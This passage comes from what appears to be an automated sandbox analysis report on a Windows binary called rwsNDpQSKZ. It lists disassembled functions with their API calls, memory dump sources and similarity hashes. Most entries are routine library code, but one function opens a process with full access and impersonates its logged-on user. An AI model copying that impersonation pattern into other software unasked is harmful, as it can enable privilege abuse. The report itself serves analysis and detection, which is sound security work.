                  • Part of subcall function 00CA8A60: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,00000000,?,?,?,?,?,?,00CA88A5,?,0000003C), ref: 00CA8A9A
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA8991
                  • Part of subcall function 00C54490: __EH_prolog3.LIBCMT ref: 00C54497
                • ?ToString@CCmmArchivePath@Cmm@@QBEXABV?$CStringT@_W@2@AAV32@@Z.RWSNDPQSKZ(?,?,00D3C860,?,?,?,?,?,0000003C), ref: 00CA89A4
                • ??0?$CStringT@_W@Cmm@@QAE@PB_W@Z.RWSNDPQSKZ(00D3C860,?,?,?,?,?,0000003C), ref: 00CA89F2
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$ArchiveString$??0?$Node@Path@W@2@$Archive@H_prolog3H_prolog3_NamePath@3@@State@String@TreeUnlock@V123@V32@@
                • String ID:
                • API String ID: 276706240-0
                • Opcode ID: 91edea6b6e712b1053b947c1a75488972b2244bbf1756c97b0c31f847f08521a
                • Instruction ID: f5b7259ff02fee4bea02b1d9a3e9fb48f6840b97403614d79e8e7a3583622e59
                • Opcode Fuzzy Hash: 91edea6b6e712b1053b947c1a75488972b2244bbf1756c97b0c31f847f08521a
                • Instruction Fuzzy Hash: 02113774D00249DFCB04DFB4C4416EEBBB4EF08718F14942AE405B7240EB749B89EBAA
                Function 00CA8740 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                Download Yara Rule
                APIs
                • ??0CCmmArchiveTreeNode@Archive@Cmm@@QAE@XZ.RWSNDPQSKZ(?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?,?,000000FF), ref: 00CA8755
                • ?SetName@CCmmArchiveTreeNode@Archive@Cmm@@QAEXABV?$CStringT@_W@3@@Z.RWSNDPQSKZ(?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?,?), ref: 00CA8766
                • ?Assign@CCmmArchiveVarivant@Cmm@@IAEXABV12@@Z.RWSNDPQSKZ(?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000,?), ref: 00CA878A
                  • Part of subcall function 00CA9920: ?SetString@CCmmArchiveVarivant@Cmm@@QAEXPB_W@Z.RWSNDPQSKZ(00000000,?,00000000,?,00CA878F,?,?,?,00000000,?,?,00CA5031,?,?,?,?), ref: 00CA9949
                • ?Duplicate@CCmmArchiveTreeNode@Archive@Cmm@@QAEPAV123@H@Z.RWSNDPQSKZ(?,?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000), ref: 00CA8799
                • ?AppendChild@CCmmArchiveTreeNode@Archive@Cmm@@QAEHPAV123@@Z.RWSNDPQSKZ(00000000,?,?,?,00000000,?,?,00CA5031,?,?,?,?,?,?,00CA57E8,00000000), ref: 00CA87A5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ArchiveCmm@@$Archive@Node@Tree$Varivant@$AppendAssign@Child@Duplicate@Name@StringString@V123@V123@@V12@@W@3@@
                • String ID:
                • API String ID: 653431653-0
                • Opcode ID: 3549b46a8bc1adf1107df48fc6e617d9635882fddc67f8975ac84b3e2b8b5139
                • Instruction ID: 5584174270631f6c94186186f3f415e557323744fc82d476d0fac8e62a8c9d1a
                • Opcode Fuzzy Hash: 3549b46a8bc1adf1107df48fc6e617d9635882fddc67f8975ac84b3e2b8b5139
                • Instruction Fuzzy Hash: 78018C75A00A06AB8754DB25C54195BF7E9FB897247100529F80AC7B00EF30F914DBD0
                Function 00C5C660 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00C5C667
                • ??0CCmmArchiveObjHelper@Cmm@@QAE@PBD@Z.RWSNDPQSKZ(00000003,00000008,00CAC4ED,000000FF), ref: 00C5C688
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000008,00000003,00000008,00CAC4ED,000000FF), ref: 00C5C69A
                • ?FlatternToMsg@CCmmMessageHelper@Cmm@@YAPAVCmmMQ_Msg@2@PAVCCmmArchiveObjHelper@2@H@Z.RWSNDPQSKZ(00000008,?), ref: 00C5C6B8
                • ??1CCmmArchiveObjHelper@Cmm@@QAE@XZ.RWSNDPQSKZ ref: 00C5C6C4
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@$ArchiveHelper@$FlatternH_prolog3Helper@2@MessageMsg@Msg@2@State@Unlock@
                • String ID:
                • API String ID: 1744004279-0
                • Opcode ID: 73d835ea9a2da49726cc2bcc635f6c243f5651e0901fe8bcbdb8ea8b8bab8eb5
                • Instruction ID: 902aa7855edef6f07084e83e1f2d5780bf30ff150d17d899998ce0c85df9985f
                • Opcode Fuzzy Hash: 73d835ea9a2da49726cc2bcc635f6c243f5651e0901fe8bcbdb8ea8b8bab8eb5
                • Instruction Fuzzy Hash: EE018B756002069FCB04EFA4D9C08AEB7B1AF54315B60412AF812DB2A1DF70EE84DBA5
                Function 00D0E643 Relevance: 7.5, APIs: 5, Instructions: 41memoryCOMMON
                Download Yara Rule
                APIs
                • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00CDD34D), ref: 00D0E648
                • HeapAlloc.KERNEL32(00000000), ref: 00D0E64F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000), ref: 00D0E67C
                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D0E695
                • HeapFree.KERNEL32(00000000), ref: 00D0E69C
                  • Part of subcall function 00D0E4E1: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,00D0E68B,00000000), ref: 00D0E505
                  • Part of subcall function 00D0E4E1: HeapAlloc.KERNEL32(00000000), ref: 00D0E50C
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Heap$Process$Alloc$Cmm@@FreeState@Unlock@
                • String ID:
                • API String ID: 3289356700-0
                • Opcode ID: 2ab5b78aee55d4611ad1398fa44dac7348e6610296aa683e5bc9d8fd1c3e9df6
                • Instruction ID: e13b7f4b4072d03a01e2975b76cbd1286794834b594b29e03cd24e0343d4e0cc
                • Opcode Fuzzy Hash: 2ab5b78aee55d4611ad1398fa44dac7348e6610296aa683e5bc9d8fd1c3e9df6
                • Instruction Fuzzy Hash: 66F09672644721ABC72027787D0879A3B66AF94751B168C29F54AC7384DF71C8028770
                Function 00D08007 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • _free.LIBCMT ref: 00D0801F
                  • Part of subcall function 00CFE54D: HeapFree.KERNEL32(00000000,00000000,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?), ref: 00CFE563
                  • Part of subcall function 00CFE54D: GetLastError.KERNEL32(?,?,00D082A9,?,00000000,?,?,?,00D0854C,?,00000007,?,?,00D089A1,?,?), ref: 00CFE575
                • _free.LIBCMT ref: 00D08031
                • _free.LIBCMT ref: 00D08043
                • _free.LIBCMT ref: 00D08055
                • _free.LIBCMT ref: 00D08067
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: d43e8a7193663ad4731134cb6a6ce36314572fe9121e463d4ab21c1976fcebe2
                • Instruction ID: b843c510917cf035a9ebf266b4401980950f40f9123ec7114ca658585068c468
                • Opcode Fuzzy Hash: d43e8a7193663ad4731134cb6a6ce36314572fe9121e463d4ab21c1976fcebe2
                • Instruction Fuzzy Hash: 77F06232500284EBC670EB54E8C6D2A73DABA0076479C0C09F19DDB6A0DB70FD806BB1
                Function 00CBE33A Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                Download Yara Rule
                APIs
                • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000080,00000003,?,?,00CBE6C5,00000000), ref: 00CBE352
                • GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE35E
                • ImpersonateLoggedOnUser.ADVAPI32(00000000,?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 00CBE375
                • GetLastError.KERNEL32(?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C,00CADEA7), ref: 00CBE381
                • CloseHandle.KERNEL32(00000000,?,?,00CBE6C5,00000000,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 00CBE388
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ErrorLast$CloseHandleImpersonateLoggedOpenProcessUser
                • String ID:
                • API String ID: 947513347-0
                • Opcode ID: d8538b479ba482af3bc53996b702d87cb0f98d8ad6b2a3dc6f95b863f90525f3
                • Instruction ID: fab24520d8d1e4ef349348a4c4c694788e9ff15127d7048fcd660035948ec133
                • Opcode Fuzzy Hash: d8538b479ba482af3bc53996b702d87cb0f98d8ad6b2a3dc6f95b863f90525f3
                • Instruction Fuzzy Hash: E4F030B6641726BB87211F669C488DABEAAEB55BA17108126F915C3311CF70C912D7F0
                Function 00CB2860 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB286A
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB2880
                • ??0XMLPrinter@tinyxml2@@QAE@PAU_iobuf@@_NH@Z.RWSNDPQSKZ(00000000,00000000,00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB289F
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(?,00000000,00000000,00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB28B5
                • ??1XMLPrinter@tinyxml2@@UAE@XZ.RWSNDPQSKZ ref: 00CB28C5
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Cmm@@Printer@tinyxml2@@State@Unlock@$H_prolog3_U_iobuf@@_
                • String ID:
                • API String ID: 1935669353-0
                • Opcode ID: a0939341481946f5f36e3dcac51942863bedf866d9346b4e68a1df9567c1848e
                • Instruction ID: d48d172b826b23e087756accd70fbb23bc203d95d3a1bf4946e841e248616b19
                • Opcode Fuzzy Hash: a0939341481946f5f36e3dcac51942863bedf866d9346b4e68a1df9567c1848e
                • Instruction Fuzzy Hash: BDF06D75A002249BCB19AB52DC95AFE7B35EF98310F000059F80B97391DFB06E81EEA1
                Function 00CE4DB0 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00DFECA8,00DFFC8C,?,00C62C03,00DFFC8C), ref: 00CE4DBA
                • LeaveCriticalSection.KERNEL32(00DFECA8,?,00C62C03,00DFFC8C), ref: 00CE4DED
                • ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00DFECA0,?,00DFFC8C), ref: 00CE4E5E
                • SetEvent.KERNEL32(?,00DFFC8C), ref: 00CE4E6E
                • ResetEvent.KERNEL32(?,00DFFC8C), ref: 00CE4E7A
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: CriticalEventSection$Cmm@@EnterLeaveResetState@Unlock@
                • String ID:
                • API String ID: 3897195861-0
                • Opcode ID: ba1fd928daca65cda8ea582a2e4aa17912a8d4b8c5316d567273ee54fb903478
                • Instruction ID: 116b72da0d12f16287f9703c556090d049fe8d8797f139f7a23c89adf94a85f3
                • Opcode Fuzzy Hash: ba1fd928daca65cda8ea582a2e4aa17912a8d4b8c5316d567273ee54fb903478
                • Instruction Fuzzy Hash: A601FB31901764AFC715AF19FD589E57BA5FB497117028065F902CB370CB745806CBA5
                Function 00CB2740 Relevance: 7.5, APIs: 5, Instructions: 27COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3_GS.LIBCMT ref: 00CB274A
                • ?SetError@XMLDocument@tinyxml2@@AAAXW4XMLError@2@HPBDZZ.RWSNDPQSKZ(?,00000000,00000000,00000000,000000F4,00CB2725,00000000,?), ref: 00CB2757
                  • Part of subcall function 00CB28E0: ?Reset@StrPair@tinyxml2@@QAEXXZ.RWSNDPQSKZ(00000000,?,00000000,?,?,00CB23DA,?,00000000,00000000,00000000,?,?,?,00CB27AD,?,?), ref: 00CB28FE
                  • Part of subcall function 00CB28E0: ?SetStr@StrPair@tinyxml2@@QAEXPBDH@Z.RWSNDPQSKZ(00000000,00000000), ref: 00CB2982
                • ??0XMLPrinter@tinyxml2@@QAE@PAU_iobuf@@_NH@Z.RWSNDPQSKZ(00000000,?,00000000), ref: 00CB276C
                  • Part of subcall function 00CB2A90: __EH_prolog3.LIBCMT ref: 00CB2A97
                • ?Print@XMLDocument@tinyxml2@@QBEXPAVXMLPrinter@2@@Z.RWSNDPQSKZ(?,00000000,?,00000000), ref: 00CB277D
                  • Part of subcall function 00CB2860: __EH_prolog3_GS.LIBCMT ref: 00CB286A
                  • Part of subcall function 00CB2860: ?Unlock@CState@Cmm@@QAEXXZ.RWSNDPQSKZ(00000000,000000F4,00CB2782,?,00000000,?,00000000), ref: 00CB2880
                • ??1XMLPrinter@tinyxml2@@UAE@XZ.RWSNDPQSKZ(?,00000000,?,00000000), ref: 00CB278B
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: Document@tinyxml2@@H_prolog3_Pair@tinyxml2@@Printer@tinyxml2@@$Cmm@@Error@Error@2@H_prolog3Print@Printer@2@@Reset@State@Str@U_iobuf@@_Unlock@
                • String ID:
                • API String ID: 1064447030-0
                • Opcode ID: db4bc00d4d1597ca8d892cb8e296bda55842c9dce8a73c3a38159ac5be01ec07
                • Instruction ID: f1e5907c5815b8bc0e19fdc86f4e1f08c92fcba7e87d04a4e6fa87ef5e799785
                • Opcode Fuzzy Hash: db4bc00d4d1597ca8d892cb8e296bda55842c9dce8a73c3a38159ac5be01ec07
                • Instruction Fuzzy Hash: 1BF03932900599ABCB26FA52CC05EDF7A38EBD5700F404098B40927261CB715B81EBA0
                Function 00CEEA61 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 375COMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: __freea
                • String ID: a/p$am/pm
                • API String ID: 240046367-3206640213
                • Opcode ID: 6b09a3074de52fb23626e23425deceff1ccc53615e7f0b1e1843046fafe2ad0d
                • Instruction ID: 18657437e1e99b3f91c851fb17c37daa37a924109defc0e3b35074b5da68795d
                • Opcode Fuzzy Hash: 6b09a3074de52fb23626e23425deceff1ccc53615e7f0b1e1843046fafe2ad0d
                • Instruction Fuzzy Hash: 5CC12435900296DBDF24CF6BC884BBAB7B0FF55780F284149E926AB350D3359E41CBA5
                Function 00CBA685 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 147COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBA68C
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,0000002C,00CB6140,?,?,00000048,00000000,?,?), ref: 00CBA6FB
                • __floor_pentium4.LIBCMT ref: 00CBA789
                Strings
                • unordered_map/set too long, xrefs: 00CBA842
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 4005500430-306623848
                • Opcode ID: 54b58f3adc61b503cfa7bfe02b0911b6fd32835973f16cd924a4291433ba60d9
                • Instruction ID: 85f8ebe4c3f3d8400c2ac516c812e4ab2e859123ec3c2777f78923a9e0c32ce4
                • Opcode Fuzzy Hash: 54b58f3adc61b503cfa7bfe02b0911b6fd32835973f16cd924a4291433ba60d9
                • Instruction Fuzzy Hash: 4951C171900709DFCB15DFA9C040AADFBB4FF58314F24861EE486B7252EB71A986CB51
                Function 00CBA9FB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 138COMMON
                Download Yara Rule
                APIs
                • __EH_prolog3.LIBCMT ref: 00CBAA02
                • ??0?$CStringT@_W@Cmm@@QAE@ABV01@@Z.RWSNDPQSKZ(?,?,?,00000000,?,0000001C,unordered_map/set too long,?,?,00000000,?,0000001C,00CB558F,?,?,00000000), ref: 00CBAA6E
                • __floor_pentium4.LIBCMT ref: 00CBAAE5
                Strings
                • unordered_map/set too long, xrefs: 00CBAB9E
                Memory Dump Source
                • Source File: 00000000.00000002.1837754987.0000000000C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                • Associated: 00000000.00000002.1837727651.0000000000C50000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837825379.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837903383.0000000000DEE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DEF000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837925719.0000000000DF1000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837971688.0000000000DFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E01000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1837993782.0000000000E1F000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_c50000_rwsNDpQSKZ.jbxd
                Similarity
                • API ID: ??0?$Cmm@@H_prolog3StringV01@@__floor_pentium4
                • String ID: unordered_map/set too long
                • API String ID: 4005500430-306623848
                • Opcode ID: 00df2742f411a0acb2c15eb83d928e521fab0188c7a6b618214e41f7c60a9452
